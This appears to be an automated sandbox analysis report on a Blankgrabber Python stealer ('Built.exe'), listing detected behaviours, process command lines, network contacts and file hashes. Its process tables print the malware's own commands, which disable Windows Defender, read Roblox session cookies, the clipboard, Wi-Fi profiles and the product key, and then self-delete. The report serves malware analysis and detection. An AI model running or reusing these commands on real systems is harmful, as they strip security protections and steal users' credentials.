Analysis Overview
SHA256
5abca78c05174b85888fba097e89106162261ecdac73f09d035eb22aec3261f6
Threat Level: Known bad
The file Built.exe was found to be: Known bad.
Malicious Activity Summary
Blankgrabber family
A stealer written in Python and packaged with Pyinstaller
Command and Scripting Interpreter: PowerShell
UPX packed file
Reads user/profile data of web browsers
ACProtect 1.3x - 1.4x DLL software
Executes dropped EXE
Loads dropped DLL
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Hide Artifacts: Hidden Files and Directories
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
Suspicious use of WriteProcessMemory
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
Gathers system information
Enumerates processes with tasklist
Detects videocard installed
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-26 18:05
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-26 18:05
Reported
2024-06-26 18:08
Platform
win7-20231129-en
Max time kernel
118s
Max time network
118s
Command Line
Signatures
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2232 wrote to memory of 1704 | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | C:\Users\Admin\AppData\Local\Temp\Built.exe |
| PID 2232 wrote to memory of 1704 | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | C:\Users\Admin\AppData\Local\Temp\Built.exe |
| PID 2232 wrote to memory of 1704 | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | C:\Users\Admin\AppData\Local\Temp\Built.exe |
| PID 2232 wrote to memory of 1704 | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | C:\Users\Admin\AppData\Local\Temp\Built.exe |
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\Built.exe | "C:\Users\Admin\AppData\Local\Temp\Built.exe" |
| C:\Users\Admin\AppData\Local\Temp\Built.exe | "C:\Users\Admin\AppData\Local\Temp\Built.exe" |
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI22322\python311.dll
| MD5 | e7103e2bf67b33f3c866e944329ddd7b |
| SHA1 | 3bab461ec7782a4949964b591c14d8f3bacc1098 |
| SHA256 | b36c67f6ab5dbe6104f4abf3f1c19a702af20d8bedcf9ef5e499dc84e62d6fbd |
| SHA512 | b45629330d0f67788b4c7f1ec61bce0b64f567d6bcfcbccb14289284672eee81d3d8f4036d58e9f24f3c86b5e67d2b5d58253d03249c4e151ac0a0ba2134d88b |
memory/1704-23-0x0000000074530000-0x0000000074A3A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-26 18:05
Reported
2024-06-26 18:08
Platform
win10v2004-20240611-en
Max time kernel
144s
Max time network
117s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI16282\rar.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\Built.exe | "C:\Users\Admin\AppData\Local\Temp\Built.exe" |
| C:\Users\Admin\AppData\Local\Temp\Built.exe | "C:\Users\Admin\AppData\Local\Temp\Built.exe" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" |
| C:\Windows\SysWOW64\tasklist.exe | tasklist /FO LIST |
| C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic csproduct get uuid |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe' |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" |
| C:\Windows\SysWOW64\reg.exe | REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" |
| C:\Windows\SysWOW64\reg.exe | REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" |
| C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic path win32_VideoController get name |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" |
| C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic path win32_VideoController get name |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"" |
| C:\Windows\SysWOW64\attrib.exe | attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" |
| C:\Windows\SysWOW64\tasklist.exe | tasklist /FO LIST |
| C:\Windows\SysWOW64\tasklist.exe | tasklist /FO LIST |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" |
| C:\Windows\SysWOW64\Wbem\WMIC.exe | WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "tree /A /F" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "netsh wlan show profile" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "systeminfo" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [encoded command elided]" |
| C:\Windows\SysWOW64\tasklist.exe | tasklist /FO LIST |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell Get-Clipboard |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [encoded command elided] |
| C:\Windows\SysWOW64\netsh.exe | netsh wlan show profile |
| C:\Windows\SysWOW64\tree.com | tree /A /F |
| C:\Windows\SysWOW64\systeminfo.exe | systeminfo |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "tree /A /F" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY |
| C:\Windows\SysWOW64\tree.com | tree /A /F |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "tree /A /F" |
| C:\Windows\SysWOW64\tree.com | tree /A /F |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "tree /A /F" |
| C:\Windows\SysWOW64\tree.com | tree /A /F |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "tree /A /F" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gbnof1nn\gbnof1nn.cmdline" |
| C:\Windows\SysWOW64\tree.com | tree /A /F |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "tree /A /F" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A26.tmp" "c:\Users\Admin\AppData\Local\Temp\gbnof1nn\CSC6D949D6C16CB4DFAA052AA6D78B9B023.TMP" |
| C:\Windows\SysWOW64\tree.com | tree /A /F |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "getmac" |
| C:\Windows\SysWOW64\getmac.exe | getmac |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI16282\rar.exe a -r -hp"Jackass2472020@" "C:\Users\Admin\AppData\Local\Temp\tLRQ8.zip" *" |
| C:\Users\Admin\AppData\Local\Temp\_MEI16282\rar.exe | C:\Users\Admin\AppData\Local\Temp\_MEI16282\rar.exe a -r -hp"Jackass2472020@" "C:\Users\Admin\AppData\Local\Temp\tLRQ8.zip" * |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "wmic os get Caption" |
| C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic os get Caption |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" |
| C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic computersystem get totalphysicalmemory |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" |
| C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic csproduct get uuid |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" |
| C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic path win32_VideoController get name |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Built.exe"" |
| C:\Windows\SysWOW64\PING.EXE | ping localhost -n 3 |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-vf5mx.in | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 142.250.180.3:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI16282\python311.dll
| MD5 | e7103e2bf67b33f3c866e944329ddd7b |
| SHA1 | 3bab461ec7782a4949964b591c14d8f3bacc1098 |
| SHA256 | b36c67f6ab5dbe6104f4abf3f1c19a702af20d8bedcf9ef5e499dc84e62d6fbd |
| SHA512 | b45629330d0f67788b4c7f1ec61bce0b64f567d6bcfcbccb14289284672eee81d3d8f4036d58e9f24f3c86b5e67d2b5d58253d03249c4e151ac0a0ba2134d88b |
C:\Users\Admin\AppData\Local\Temp\_MEI16282\VCRUNTIME140.dll
| MD5 | a0df29af5f6135b735dee359c0871ecf |
| SHA1 | f7ebb9a9fd00e1ac95537158fae1167b06f490bd |
| SHA256 | 35afadbacc9a30341c1a5ee2117e69583e5044cea0bfab636dccbdcc281a8786 |
| SHA512 | fdc7a62d0b187829708ec544de52b4037da613e01a7591a2abc55f95c4719ee04f9c51d31f01edb7161b5edc3cd85004c3a55d375116baa76fb44553df592b3e |
memory/3384-25-0x0000000074E00000-0x000000007530A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI16282\base_library.zip
| MD5 | 2efeab81308c47666dfffc980b9fe559 |
| SHA1 | 8fbb7bbdb97e888220df45cc5732595961dbe067 |
| SHA256 | a20eeb4ba2069863d40e4feab2136ca5be183887b6368e32f1a12c780a5af1ad |
| SHA512 | 39b030931a7a5940edc40607dcc9da7ca1bf479e34ebf45a1623a67d38b98eb4337b047cc8261038d27ed9e9d6f2b120abbf140c6c90d866cdba0a4c810ac32c |
C:\Users\Admin\AppData\Local\Temp\_MEI16282\_ctypes.pyd
| MD5 | e6f488f9ef063cec266cb03ecde771e9 |
| SHA1 | 8f9b7780df25867599cf92f42ad7dab5cc37c60b |
| SHA256 | 1ea6ecb02632b85e278a4a74d5560662b6a9652ee8c03214139a00935abd4d3f |
| SHA512 | 47d57e082e1e172612efb364d44a407fb3dafb4efc6de02585f62bc65d39b57f233a0cdd9b3c2bd0539288b08176bd165cc1290319e861c35f5c3c877a930156 |
memory/3384-30-0x0000000074DB0000-0x0000000074DCF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI16282\_ssl.pyd
| MD5 | a8ae5dcda6d67f440a3f8e63552fe0fa |
| SHA1 | bae799a1fd18bf8c7addd1a964673621528a7750 |
| SHA256 | 866177b3d7c88d3ed908cf8b4651662b25c35f6a7e929d751f9dc4f72a535359 |
| SHA512 | b2ed4d63ca18129a30104b14931451c68524c059b785fb70801aa9f35c399c57dd87a1d7b091814d242ada2dd6485e4922e07529b526efcbeb7e8f30c5cc8be2 |
C:\Users\Admin\AppData\Local\Temp\_MEI16282\_sqlite3.pyd
| MD5 | a0b2149db2739de793a5dab22e07da02 |
| SHA1 | 77af2ca0f168b38a54ceb49ac5aac76175667142 |
| SHA256 | 5d5a6e1b9f617d8acd0285d04764f68e6fa388dc3d640aae77999d84a9ac1283 |
| SHA512 | 331056b85927acfd099226fe67c70d3e983062a980742e696eac0cb53a19d53747507c36255b63c629a6ee51ecb7517a6a36726013f7dae4793018ee8159cd81 |
C:\Users\Admin\AppData\Local\Temp\_MEI16282\_socket.pyd
| MD5 | 88b9bf60bea71ef90af7223ebe895319 |
| SHA1 | 3272cab72a29855eefd68a2b85300c85553020d9 |
| SHA256 | fccad475b318a8ccdbb7cf05743be5d47a64d93615922bc0a890ab04f5319b26 |
| SHA512 | ac4b88e3e917ee8ae58b9b71523abb01fc7e1477df1f8c3c1b9ff273e16ae614fc8f7b587df3abc8bc2066a452e88d63768001c85472c7dbdf44dc407c3bc74d |
C:\Users\Admin\AppData\Local\Temp\_MEI16282\_queue.pyd
